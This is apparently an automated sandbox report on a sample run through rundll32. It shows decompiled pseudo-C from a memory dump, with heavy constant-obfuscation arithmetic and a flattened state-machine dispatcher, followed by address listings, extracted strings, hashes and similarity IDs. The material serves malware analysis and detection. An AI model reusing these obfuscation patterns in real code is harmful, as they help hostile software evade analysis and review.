				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				void* _t758;
				signed int _t798;
				void* _t803;
				void* _t804;
				void* _t811;

				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0xa2c333;
				_v2612 = 0xd97943;
				_v2696 = 0x74b91;
				_v2696 = _v2696 + 0xffffab65;
				_v2696 = _v2696 ^ 0x0006f6df;
				_v2804 = 0x130b03;
				_v2804 = _v2804 << 9;
				_v2804 = _v2804 + 0x8374;
				_v2804 = _v2804 ^ 0x26068974;
				_v2876 = 0x240a80;
				_v2876 = _v2876 >> 6;
				_v2876 = _v2876 >> 5;
				_v2876 = _v2876 ^ 0x3e269fec;
				_v2876 = _v2876 ^ 0x3e253447;
				_v2924 = 0x49db5b;
				_v2924 = _v2924 + 0xd552;
				_t803 = __ecx;
				_t798 = 0xce4571;
				_t738 = 0x27;
				_v2924 = _v2924 / _t738;
				_v2924 = _v2924 + 0x3019;
				_v2924 = _v2924 ^ 0x0006d24f;
				_v2796 = 0xf8ea63;
				_v2796 = _v2796 << 3;
				_v2796 = _v2796 + 0x8798;
				_v2796 = _v2796 ^ 0x07c9cae5;
				_v2864 = 0x679d3b;
				_t739 = 0x25;
				_v2864 = _v2864 * 0x7a;
				_v2864 = _v2864 / _t739;
				_v2864 = _v2864 << 0xc;
				_v2864 = _v2864 ^ 0x5a5eda92;
				_v2688 = 0xbc1f25;
				_v2688 = _v2688 << 0xd;
				_v2688 = _v2688 ^ 0x83e15555;
				_v2700 = 0xc3e9b4;
				_v2700 = _v2700 ^ 0x7e7d7a5b;
				_v2700 = _v2700 ^ 0x7ebc2479;
				_v2684 = 0x348655;
				_v2684 = _v2684 + 0xffff5240;
				_v2684 = _v2684 ^ 0x0038d539;
				_v2836 = 0xc8c90d;
				_v2836 = _v2836 | 0x6050777e;
				_v2836 = _v2836 + 0xfffffb37;
				_v2836 = _v2836 << 0xe;
				_v2836 = _v2836 ^ 0x3ea8df0c;
				_v2664 = 0x4ea234;
				_v2664 = _v2664 ^ 0x152f142f;
				_v2664 = _v2664 ^ 0x1568dd81;
				_v2900 = 0xa78742;
				_v2900 = _v2900 * 0x70;
				_v2900 = _v2900 + 0x89c7;
				_v2900 = _v2900 * 0x26;
				_v2900 = _v2900 ^ 0xe13351a3;
				_v2752 = 0x43c729;
				_v2752 = _v2752 * 9;
				_v2752 = _v2752 >> 0xc;
				_v2752 = _v2752 ^ 0x0004a0a7;
				_v2656 = 0x163ba0;
				_v2656 = _v2656 | 0x3b2cca0a;
				_v2656 = _v2656 ^ 0x3b3c61f3;
				_v2800 = 0x539f85;
				_v2800 = _v2800 + 0xffff9927;
				_v2800 = _v2800 >> 0xd;
				_v2800 = _v2800 ^ 0x000ca278;
				_v2892 = 0xaa9f70;
				_v2892 = _v2892 | 0xffd04745;
				_t740 = 0x33;
				_v2892 = _v2892 * 0x48;
				_v2892 = _v2892 + 0xabed;
				_v2892 = _v2892 ^ 0xfe85b4b6;
				_v2728 = 0x66b1f8;
				_v2728 = _v2728 + 0xffffb85a;
				_v2728 = _v2728 + 0xffff17c5;
				_v2728 = _v2728 ^ 0x00666892;
				_v2792 = 0x34b823;
				_v2792 = _v2792 + 0x705f;
				_v2792 = _v2792 | 0x13d147dd;
				_v2792 = _v2792 ^ 0x13fd2081;
				_v2884 = 0x7f5269;
				_v2884 = _v2884 >> 0x10;
				_v2884 = _v2884 + 0xdf59;
				_v2884 = _v2884 ^ 0x086ba2e3;
				_v2884 = _v2884 ^ 0x086346ed;
				_v2784 = 0x4150c;
				_v2784 = _v2784 ^ 0xadfae27c;
				_v2784 = _v2784 << 0xf;
				_v2784 = _v2784 ^ 0x7bb89155;
				_v2860 = 0x3ff4f9;
				_v2860 = _v2860 + 0x97ef;
				_v2860 = _v2860 ^ 0x8a52113e;
				_v2860 = _v2860 * 0x3b;
				_v2860 = _v2860 ^ 0xd244680a;
				_v2920 = 0xf20633;
				_v2920 = _v2920 >> 0xa;
				_v2920 = _v2920 << 6;
				_v2920 = _v2920 | 0x86ded8f3;
				_v2920 = _v2920 ^ 0x86d0715a;
				_v2676 = 0xbc4416;
				_v2676 = _v2676 + 0x253a;
				_v2676 = _v2676 ^ 0x00bded5f;
				_v2928 = 0x15fa7c;
				_v2928 = _v2928 >> 1;
				_v2928 = _v2928 * 0x6e;
				_v2928 = _v2928 >> 4;
				_v2928 = _v2928 ^ 0x00445a38;
				_v2844 = 0xaff44e;
				_v2844 = _v2844 * 0x28;
				_v2844 = _v2844 ^ 0x281c7ad4;
				_v2844 = _v2844 * 0xe;
				_v2844 = _v2844 ^ 0xcf625ac8;
				_v2744 = 0x5c05ba;
				_v2744 = _v2744 << 1;
				_v2744 = _v2744 ^ 0x54918a83;
				_v2744 = _v2744 ^ 0x542c1472;
				_v2904 = 0xa399f4;
				_v2904 = _v2904 / _t740;
				_t741 = 9;
				_v2904 = _v2904 / _t741;
				_v2904 = _v2904 >> 0xb;
				_v2904 = _v2904 ^ 0x000d27e7;
				_v2912 = 0xbe4d5b;
				_v2912 = _v2912 << 2;
				_v2912 = _v2912 >> 8;
				_v2912 = _v2912 + 0xbc5;
				_v2912 = _v2912 ^ 0x000f01bd;
				_v2888 = 0xb7f9c;
				_v2888 = _v2888 ^ 0x23a090a0;
				_v2888 = _v2888 + 0xffffcb65;
				_v2888 = _v2888 + 0xffffb53f;
				_v2888 = _v2888 ^ 0x23a896a2;
				_v2776 = 0xcbb323;
				_v2776 = _v2776 + 0x81c3;
				_v2776 = _v2776 >> 1;
				_v2776 = _v2776 ^ 0x00676393;
				_v2648 = 0x271f91;
				_v2648 = _v2648 + 0xffff9397;
				_v2648 = _v2648 ^ 0x0029f035;
				_v2896 = 0x78618c;
				_v2896 = _v2896 << 0xc;
				_v2896 = _v2896 ^ 0x0a821cde;
				_v2896 = _v2896 + 0xb475;
				_v2896 = _v2896 ^ 0x8c94da80;
				_v2720 = 0xacdc2a;
				_v2720 = _v2720 | 0x57611697;
				_v2720 = _v2720 ^ 0xc01b1ef4;
				_v2720 = _v2720 ^ 0x97fc8dfe;
				_v2668 = 0x55603e;
				_v2668 = _v2668 >> 1;
				_v2668 = _v2668 ^ 0x002dad1d;
				_v2828 = 0xf126f6;
				_t742 = 0x29;
				_v2828 = _v2828 * 0x43;
				_v2828 = _v2828 + 0x8cbb;
				_v2828 = _v2828 ^ 0x3f126f56;
				_v2768 = 0x9c087b;
				_v2768 = _v2768 << 9;
				_v2768 = _v2768 + 0xffffe171;
				_v2768 = _v2768 ^ 0x3813f585;
				_v2880 = 0xb815a3;
				_v2880 = _v2880 ^ 0x72879ea7;
				_v2880 = _v2880 / _t742;
				_v2880 = _v2880 + 0xc3b;
				_v2880 = _v2880 ^ 0x02c00b8a;
				_v2872 = 0xffe9a8;
				_v2872 = _v2872 | 0x05f4b9e7;
				_v2872 = _v2872 + 0xffff2424;
				_v2872 = _v2872 << 7;
				_v2872 = _v2872 ^ 0xff8a2c7e;
				_v2808 = 0x17a98a;
				_t743 = 0x6a;
				_v2808 = _v2808 * 0x35;
				_v2808 = _v2808 + 0x8a0b;
				_v2808 = _v2808 ^ 0x04e27d5d;
				_v2644 = 0x3aca8c;
				_v2644 = _v2644 | 0x1dba2023;
				_v2644 = _v2644 ^ 0x1dba33fd;
				_v2760 = 0xa9a4ba;
				_v2760 = _v2760 ^ 0x6721c4f3;
				_v2760 = _v2760 + 0xffff7b43;
				_v2760 = _v2760 ^ 0x6786e634;
				_v2660 = 0xef5940;
				_t327 =  &_v2660; // 0xef5940
				_v2660 =  *_t327 / _t743;
				_v2660 = _v2660 ^ 0x0008b7a5;
				_v2640 = 0x8c91f9;
				_v2640 = _v2640 + 0x2aa0;
				_v2640 = _v2640 ^ 0x008fd6f1;
				_v2716 = 0xebae10;
				_v2716 = _v2716 + 0x2e93;
				_v2716 = _v2716 >> 3;
				_v2716 = _v2716 ^ 0x0012b27f;
				_v2692 = 0xf4ef17;
				_v2692 = _v2692 ^ 0x14a8ca79;
				_v2692 = _v2692 ^ 0x145940a6;
				_v2712 = 0x90da21;
				_v2712 = _v2712 * 0x5c;
				_v2712 = _v2712 << 6;
				_v2712 = _v2712 ^ 0x039c340b;
				_v2812 = 0x599c06;
				_v2812 = _v2812 | 0x7b64813d;
				_v2812 = _v2812 * 0x3e;
				_v2812 = _v2812 ^ 0xe8633365;
				_v2748 = 0x57b46;
				_t744 = 0x38;
				_v2748 = _v2748 / _t744;
				_v2748 = _v2748 + 0xffffe4a2;
				_v2748 = _v2748 ^ 0xffff7983;
				_v2856 = 0xb347e1;
				_v2856 = _v2856 << 0xf;
				_v2856 = _v2856 + 0xc3e6;
				_v2856 = _v2856 ^ 0xcd6ff0ef;
				_v2856 = _v2856 ^ 0x6e991901;
				_v2756 = 0x3d21e7;
				_v2756 = _v2756 + 0x4052;
				_v2756 = _v2756 + 0xfab6;
				_v2756 = _v2756 ^ 0x0033d413;
				_v2680 = 0xeea097;
				_v2680 = _v2680 * 0x29;
				_v2680 = _v2680 ^ 0x26367c85;
				_v2852 = 0x9a84c7;
				_v2852 = _v2852 << 4;
				_v2852 = _v2852 + 0x5305;
				_v2852 = _v2852 * 0x47;
				_v2852 = _v2852 ^ 0xadc8f5b7;
				_v2736 = 0x1d92c0;
				_v2736 = _v2736 ^ 0x4e3febcd;
				_v2736 = _v2736 ^ 0x2a5eeaad;
				_v2736 = _v2736 ^ 0x647637b5;
				_v2916 = 0x7a6f6e;
				_v2916 = _v2916 << 3;
				_v2916 = _v2916 | 0x74549758;
				_v2916 = _v2916 * 0x5e;
				_v2916 = _v2916 ^ 0x014df6ca;
				_v2820 = 0x88f64;
				_v2820 = _v2820 << 0xb;
				_v2820 = _v2820 ^ 0x8d7f89a1;
				_v2820 = _v2820 ^ 0xc90720e1;
				_v2672 = 0x9d7b6a;
				_v2672 = _v2672 * 0x74;
				_v2672 = _v2672 ^ 0x47521deb;
				_v2868 = 0x2a980b;
				_v2868 = _v2868 << 2;
				_v2868 = _v2868 * 0x37;
				_v2868 = _v2868 * 0x45;
				_v2868 = _v2868 ^ 0xdda58f8d;
				_v2704 = 0xd94882;
				_v2704 = _v2704 >> 7;
				_v2704 = _v2704 ^ 0x000dd1c5;
				_v2908 = 0x8685cf;
				_v2908 = _v2908 >> 6;
				_v2908 = _v2908 + 0x478f;
				_v2908 = _v2908 | 0x9a4acbdf;
				_v2908 = _v2908 ^ 0x9a416c75;
				_v2724 = 0x3983d7;
				_v2724 = _v2724 ^ 0xaf8ece10;
				_v2724 = _v2724 + 0xfffffe8c;
				_v2724 = _v2724 ^ 0xafb9f002;
				_v2652 = 0xb48fd9;
				_v2652 = _v2652 >> 7;
				_v2652 = _v2652 ^ 0x0003170e;
				_v2732 = 0x26e706;
				_v2732 = _v2732 + 0xffff7cb3;
				_v2732 = _v2732 << 7;
				_v2732 = _v2732 ^ 0x13307998;
				_v2840 = 0xdaf489;
				_v2840 = _v2840 ^ 0x20b9ad9c;
				_v2840 = _v2840 + 0xa5fa;
				_v2840 = _v2840 ^ 0x206e4944;
				_v2848 = 0x15799;
				_v2848 = _v2848 + 0xffffbd76;
				_v2848 = _v2848 | 0x84cc3dff;
				_v2848 = _v2848 ^ 0x84c4ee28;
				_v2740 = 0x344f78;
				_v2740 = _v2740 | 0xed30b44e;
				_v2740 = _v2740 + 0x582d;
				_v2740 = _v2740 ^ 0xed3a4892;
				_v2764 = 0x3aec11;
				_t745 = 0x14;
				_v2764 = _v2764 * 0x24;
				_v2764 = _v2764 * 0xd;
				_v2764 = _v2764 ^ 0x6bb19aaa;
				_v2772 = 0xa2a4e3;
				_v2772 = _v2772 * 0x54;
				_v2772 = _v2772 + 0xd74c;
				_v2772 = _v2772 ^ 0x35517ae7;
				_v2780 = 0xc7cad3;
				_v2780 = _v2780 ^ 0xe16f0727;
				_v2780 = _v2780 + 0xa55f;
				_v2780 = _v2780 ^ 0xe1ad612a;
				_v2788 = 0x30bac2;
				_v2788 = _v2788 << 2;
				_v2788 = _v2788 * 0x19;
				_v2788 = _v2788 ^ 0x130f6af8;
				_v2708 = 0x5b81b7;
				_v2708 = _v2708 << 0xd;
				_v2708 = _v2708 ^ 0x7032fecb;
				_v2816 = 0xe0b39a;
				_v2816 = _v2816 + 0xf3c;
				_v2816 = _v2816 * 0x29;
				_v2816 = _v2816 ^ 0x23fa5b32;
				_v2832 = 0xb37143;
				_v2832 = _v2832 + 0xffff99de;
				_v2832 = _v2832 / _t745;
				_v2832 = _v2832 | 0xcb90c15e;
				_v2832 = _v2832 ^ 0xcb9cb56b;
				_v2824 = 0xf7e429;
				_v2824 = _v2824 << 0x10;
				_v2824 = _v2824 ^ 0x4b169193;
				_v2824 = _v2824 ^ 0xaf30b470;
				_t703 = E00357CDB(_t745);
				_t797 = _v2708;
				_t736 = _t703;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t811 = _t798 - 0xa06a9d5;
							if(_t811 <= 0) {
								break;
							}
							__eflags = _t798 - 0xae01df1;
							if(__eflags == 0) {
								_push(_v2740);
								_push(0);
								_push(_t745);
								_push(1);
								_push(0);
								_push(_v2848);
								_t745 = _v2732;
								_push( &_v524);
								E0034AB87(_t745, _v2840, __eflags);
								_t804 = _t804 + 0x1c;
								_t798 = 0xfe27958;
								_t707 = 0x8a3cf08;
								goto L24;
							} else {
								__eflags = _t798 - 0xb104717;
								if(_t798 == 0xb104717) {
									_t745 = _v2748;
									_t708 = E00344816(_t745, _v2632, _v2856, _v2636, _v2756, _v2680);
									_t797 = _t708;
									_t804 = _t804 + 0x10;
									__eflags = _t708;
									_t707 = 0x8a3cf08;
									_t798 =  !=  ? 0x8a3cf08 : 0xa06a9d5;
									continue;
								} else {
									__eflags = _t798 - 0xe3ea8aa;
									if(_t798 == 0xe3ea8aa) {
										return E00351E67(_v2708, _v2816, _v2832, _v2824, _v2628);
									}
									__eflags = _t798 - 0xfe27958;
									if(_t798 != 0xfe27958) {
										goto L24;
									} else {
										E00358519(_v2764, _v2772, _t797);
										_pop(_t745);
										_t798 = 0xa06a9d5;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
							L27:
							return _t717;
						}
						if(_t811 == 0) {
							E00358519(_v2780, _v2788, _v2636);
							_pop(_t745);
							_t798 = 0xe3ea8aa;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0xce4571) {
							_push(_v2700);
							_push(_v2696);
							_push(_v2688);
							_t745 = _v2796;
							_push( &_v1044);
							E003546BB(_t745, _v2864);
							_t804 = _t804 - 0xc + 0x1c;
							_t798 = 0x2f0d176;
							while(1) {
								L1:
								goto L2;
							}
						}
						if(_t798 == 0x277711d) {
							_v2624 = E003459E9();
							_v2620 = 2 + E0034CB52(_v2668, _t714, _v2828, _v2768, _v2880) * 2;
							_t745 =  &_v2628;
							_t717 = E00358727(_t745, _v2804, _v2668, _v2872, _v2808, _v2668, _v2644, _t736, _t736, _v2760, _t736, _v2660, _v2640);
							_t804 = _t804 + 0x38;
							__eflags = _t717;
							if(__eflags != 0) {
								_t798 = 0x47e8611;
								goto L1;
							}
						} else {
							if(_t798 == 0x2f0d176) {
								E0035DA22(_v2684, _v2836, __eflags, _v2664,  &_v2084, _t745, _v2900);
								 *((short*)(E0034B6CF( &_v2084, _v2752, _v2656, _v2800))) = 0;
								E00348969(_v2892,  &_v1564, __eflags, _v2728, _v2792);
								_push(_v2860);
								_push(_v2784);
								E003447CE( &_v2084, _v2920, _v2884, _v2676, _v2928, E0035DCF7(_v2884, 0x341308, __eflags),  &_v1564, _v2844, _v2744);
								E0034A8B0(_v2904, _t722, _v2912);
								_t745 = _v2888;
								_t717 = E0034EA99(_t745, _t803, _v2776, _v2648,  &_v2604, _v2896);
								_t804 = _t804 + 0x5c;
								__eflags = _t717;
								if(__eflags != 0) {
									_t798 = 0x277711d;
									while(1) {
										L1:
										goto L2;
									}
								}
							} else {
								if(_t798 == 0x47e8611) {
									_t745 =  &_v2636;
									E0035DEDC(_t745, _v2716, _v2692, _v2712,  &_v2628, _v2812);
									_t804 = _t804 + 0x10;
									asm("sbb esi, esi");
									_t798 = (_t798 & 0xfcd19e6d) + 0xe3ea8aa;
									while(1) {
										L1:
										goto L2;
									}
								} else {
									_t816 = _t798 - _t707;
									if(_t798 != _t707) {
										goto L24;
									} else {
										_push(_v2916);
										_push(_v2736);
										_t730 = E0035DCF7(_v2852, 0x3413f8, _t816);
										_pop(_t758);
										E0035453F(_v2820, _t816, _v2672, _t730, _v2868,  &_v1044, _t758, _v2704, _v2908, _t797,  &_v2604);
										_t804 = _t804 + 0x24;
										E0034A8B0(_v2724, _t730, _v2652);
										_pop(_t745);
										_t798 = 0xae01df1;
										while(1) {
											L1:
											goto L2;
										}
									}
								}
							}
						}
						goto L27;
						L24:
						__eflags = _t798 - 0xe39a6fa;
					} while (__eflags != 0);
					return _t707;
				}
			}

0x00354b8d
0x00354b97
0x00354ba2
0x00354bad
0x00354bb8
0x00354bc3
0x00354bce
0x00354bd9
0x00354be1
0x00354bec
0x00354bf7
0x00354bff
0x00354c04
0x00354c09
0x00354c11
0x00354c19
0x00354c21
0x00354c33
0x00354c35
0x00354c3a
0x00354c3f
0x00354c45
0x00354c4d
0x00354c55
0x00354c60
0x00354c68
0x00354c73
0x00354c7e
0x00354c8b
0x00354c8c
0x00354c96
0x00354c9a
0x00354c9f
0x00354ca7
0x00354cb2
0x00354cba
0x00354cc5
0x00354cd0
0x00354cdb
0x00354ce6
0x00354cf1
0x00354cfc
0x00354d07
0x00354d0f
0x00354d17
0x00354d1f
0x00354d24
0x00354d2c
0x00354d37
0x00354d42
0x00354d4d
0x00354d5a
0x00354d5e
0x00354d6b
0x00354d6f
0x00354d77
0x00354d8a
0x00354d91
0x00354d99
0x00354da4
0x00354daf
0x00354dba
0x00354dc5
0x00354dd0
0x00354ddb
0x00354de3
0x00354df0
0x00354df8
0x00354e07
0x00354e0a
0x00354e0e
0x00354e16
0x00354e1e
0x00354e29
0x00354e34
0x00354e3f
0x00354e4a
0x00354e55
0x00354e60
0x00354e6b
0x00354e76
0x00354e7e
0x00354e83
0x00354e8b
0x00354e93
0x00354e9b
0x00354ea6
0x00354eb1
0x00354eb9
0x00354ec4
0x00354ecc
0x00354ed4
0x00354ee1
0x00354ee5
0x00354eed
0x00354ef5
0x00354efa
0x00354eff
0x00354f07
0x00354f0f
0x00354f1a
0x00354f25
0x00354f30
0x00354f38
0x00354f41
0x00354f45
0x00354f4a
0x00354f52
0x00354f5f
0x00354f63
0x00354f70
0x00354f74
0x00354f7c
0x00354f87
0x00354f8e
0x00354f99
0x00354fa4
0x00354fb4
0x00354fbc
0x00354fbf
0x00354fc3
0x00354fc8
0x00354fd0
0x00354fd8
0x00354fdd
0x00354fe2
0x00354fea
0x00354ff2
0x00354ffa
0x00355002
0x0035500a
0x00355012
0x0035501a
0x00355025
0x00355032
0x00355039
0x00355044
0x0035504f
0x0035505a
0x00355065
0x0035506d
0x00355072
0x0035507a
0x00355082
0x0035508a
0x00355095
0x003550a0
0x003550ab
0x003550b6
0x003550c1
0x003550c8
0x003550d3
0x003550e2
0x003550e5
0x003550e9
0x003550f1
0x003550f9
0x00355104
0x0035510c
0x00355117
0x00355122
0x0035512a
0x0035513a
0x0035513e
0x00355146
0x0035514e
0x00355156
0x0035515e
0x00355166
0x0035516b
0x00355173
0x00355186
0x00355187
0x0035518e
0x00355199
0x003551a4
0x003551af
0x003551ba
0x003551c5
0x003551d0
0x003551db
0x003551e6
0x003551f1
0x003551fc
0x00355205
0x0035520c
0x00355217
0x00355222
0x0035522d
0x00355238
0x00355243
0x0035524e
0x00355256
0x00355261
0x0035526c
0x00355277
0x00355282
0x00355295
0x0035529c
0x003552a4
0x003552af
0x003552ba
0x003552cd
0x003552d4
0x003552e1
0x003552f5
0x003552f8
0x003552ff
0x0035530a
0x00355315
0x0035531d
0x00355322
0x0035532a
0x00355332
0x0035533a
0x00355345
0x00355350
0x0035535b
0x00355366
0x00355379
0x00355380
0x0035538b
0x00355393
0x00355398
0x003553a5
0x003553a9
0x003553b1
0x003553bc
0x003553c7
0x003553d2
0x003553dd
0x003553e5
0x003553ea
0x003553f7
0x003553fb
0x00355403
0x0035540e
0x00355416
0x00355421
0x0035542c
0x0035543f
0x00355446
0x00355451
0x00355459
0x00355463
0x0035546c
0x00355470
0x00355478
0x00355483
0x0035548b
0x00355496
0x0035549e
0x003554a3
0x003554ab
0x003554b3
0x003554bb
0x003554c6
0x003554d1
0x003554dc
0x003554e7
0x003554f2
0x003554fa
0x00355505
0x00355510
0x0035551b
0x00355523
0x0035552e
0x0035553e
0x00355546
0x0035554e
0x00355556
0x00355568
0x00355570
0x00355578
0x00355580
0x0035558b
0x00355596
0x003555a1
0x003555ac
0x003555c1
0x003555c2
0x003555d1
0x003555d8
0x003555e3
0x003555f6
0x003555fd
0x00355608
0x00355613
0x0035561e
0x00355629
0x00355634
0x0035563f
0x0035564a
0x0035565a
0x00355661
0x0035566c
0x00355677
0x0035567f
0x0035568a
0x00355695
0x003556a8
0x003556af
0x003556ba
0x003556c2
0x003556d0
0x003556d4
0x003556dc
0x003556e4
0x003556ec
0x003556f1
0x003556f9
0x00355709
0x0035570e
0x00355715
0x00355717
0x00355717
0x0035571c
0x0035571c
0x0035571c
0x0035571c
0x00355722
0x00000000
0x00000000
0x00355a30
0x00355a36
0x00355ac0
0x00355ace
0x00355ad0
0x00355ad1
0x00355ad3
0x00355ad5
0x00355ae0
0x00355ae7
0x00355ae8
0x00355aed
0x00355af0
0x00355af5
0x00000000
0x00355a3c
0x00355a3c
0x00355a42
0x00355a9b
0x00355aa2
0x00355aa7
0x00355aa9
0x00355aac
0x00355ab3
0x00355ab8
0x00000000
0x00355a44
0x00355a44
0x00355a4a
0x00000000
0x00355b2d
0x00355a50
0x00355a56
0x00000000
0x00355a5c
0x00355a6b
0x00355a70
0x00355a71
0x00355717
0x00355717
0x00000000
0x00355717
0x00355717
0x00355a56
0x00355a42
0x00355b3a
0x00355b3a
0x00355b3a
0x00355728
0x00355a20
0x00355a25
0x00355a26
0x00355717
0x00355717
0x00000000
0x00355717
0x00355717
0x00355734
0x003559ce
0x003559dc
0x003559e3
0x003559ee
0x003559f8
0x003559f9
0x003559fe
0x00355a01
0x00355717
0x00355717
0x00000000
0x00355717
0x00355717
0x00355740
0x00355948
0x0035597a
0x003559ad
0x003559b4
0x003559b9
0x003559bc
0x003559be
0x003559c4
0x00000000
0x003559c4
0x00355746
0x0035574c
0x0035584c
0x00355889
0x00355890
0x00355895
0x0035589e
0x003558e5
0x003558f4
0x00355918
0x0035591c
0x00355921
0x00355924
0x00355926
0x0035592c
0x00355717
0x00355717
0x00000000
0x00355717
0x00355717
0x00355752
0x00355758
0x003557f8
0x0035580d
0x00355812
0x00355817
0x0035581f
0x00355717
0x00355717
0x00000000
0x00355717
0x0035575e
0x0035575e
0x00355760
0x00000000
0x00355766
0x00355766
0x0035576f
0x0035577a
0x00355780
0x003557ba
0x003557bf
0x003557d2
0x003557d7
0x003557d8
0x00355717
0x00355717
0x00000000
0x00355717
0x00355717
0x00355760
0x00355758
0x0035574c
0x00000000
0x00355afa
0x00355afa
0x00355afa
0x00000000
0x0035571c

Strings

[z}~, xrefs: 00354CD0
G4%>, xrefs: 00354C11
~wP`, xrefs: 00354D0F
DIn , xrefs: 0035554E
e3c, xrefs: 003552D4
zQ5, xrefs: 00355608
@Y, xrefs: 003551FC
8ZD, xrefs: 00355701
>`U, xrefs: 003550B6
:%, xrefs: 00354F1A
_p, xrefs: 00354E55
R@, xrefs: 00355345
!=, xrefs: 0035533A
-X, xrefs: 00355596
noz, xrefs: 003553DD
8ZD, xrefs: 00354F3C
', xrefs: 00354FC8

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: -X$8ZD$8ZD$:%$>`U$@Y$DIn $G4%>$R@$[z}~$_p$e3c$noz$~wP`$!=$'$zQ5
API String ID: 1514166925-3442493123
Opcode ID: f4c5b7b68952b114b30d3024ca3596c211feb344a07c412664aed5b03a216e55
Instruction ID: 494fe18c0ab155f0eb86f6b61a29b356ea576a4ca4ce2d0530f64bb29b1a2d53
Opcode Fuzzy Hash: f4c5b7b68952b114b30d3024ca3596c211feb344a07c412664aed5b03a216e55
Instruction Fuzzy Hash: D272FF714083819FD3B9CF25C58AB9BBBE1BBC4318F108A1DE5DA96260D7B49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00352550 Relevance: 21.1, Strings: 16, Instructions: 1077
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00352550() {
				signed int _v28;
				char _v36;
				char _v84;
				signed int _v100;
				signed int _v104;
				signed int _v112;
				signed int _v124;
				signed int _v140;
				intOrPtr _v144;
				char _v152;
				signed int _v172;
				char _v180;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				unsigned int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				unsigned int _v532;
				signed int _v536;
				signed int _v540;
				unsigned int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				unsigned int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				signed int _t1124;
				signed int _t1125;
				signed int _t1130;
				void* _t1134;
				signed int _t1141;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1195;
				signed int _t1196;
				signed int _t1197;
				signed int _t1198;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1313;
				signed int _t1314;
				signed int _t1317;
				signed int _t1343;
				void* _t1345;
				void* _t1348;
				void* _t1349;
				void* _t1350;

				_t1345 = (_t1343 & 0xfffffff8) - 0x278;
				_v372 = 0xaca17;
				_v372 = _v372 << 9;
				_v372 = _v372 ^ 0xc9927700;
				_v372 = _v372 ^ 0xdc065802;
				_v560 = 0xa158a0;
				_v560 = _v560 + 0xffff5dcd;
				_v560 = _v560 ^ 0x175bafac;
				_v560 = _v560 + 0xffff9e49;
				_v560 = _v560 ^ 0x17fab80a;
				_v288 = 0xd4a9a6;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x001a9534;
				_v504 = 0xe9a5d3;
				_v504 = _v504 << 0xa;
				_v504 = _v504 | 0xea5982c0;
				_t1190 = 0x5f;
				_v504 = _v504 / _t1190;
				_v504 = _v504 ^ 0x028f5db6;
				_t1317 = 0x5d794ec;
				_v304 = 0x85b0a3;
				_v304 = _v304 | 0x2bca024a;
				_v304 = _v304 ^ 0x2bcc012b;
				_v556 = 0x1ecc82;
				_v556 = _v556 | 0xf08df0d8;
				_v556 = _v556 + 0xa531;
				_v556 = _v556 ^ 0xfe698427;
				_v556 = _v556 ^ 0x0ecdaa65;
				_v300 = 0x8f610e;
				_v300 = _v300 + 0xfe33;
				_v300 = _v300 ^ 0x0094e207;
				_v600 = 0x1cab4a;
				_t1193 = 0x18;
				_v600 = _v600 / _t1193;
				_v600 = _v600 + 0xffff3801;
				_v600 = _v600 + 0x515c;
				_v600 = _v600 ^ 0x0001e7c9;
				_v568 = 0xbab742;
				_v568 = _v568 + 0xcc5d;
				_v568 = _v568 | 0x5c48aa02;
				_t1194 = 0x5e;
				_v568 = _v568 / _t1194;
				_v568 = _v568 ^ 0x00f9db2d;
